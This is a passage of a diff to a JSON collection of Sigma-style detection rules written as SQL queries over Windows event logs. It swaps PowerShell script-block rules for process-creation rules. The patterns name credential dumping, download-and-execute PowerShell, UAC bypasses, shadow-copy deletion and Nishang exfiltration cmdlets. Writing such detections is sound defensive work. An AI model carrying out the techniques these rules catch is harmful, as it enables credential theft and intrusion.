Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate 
process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": 
"TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": 
"posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, 
Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + 
"attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE 
'%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE 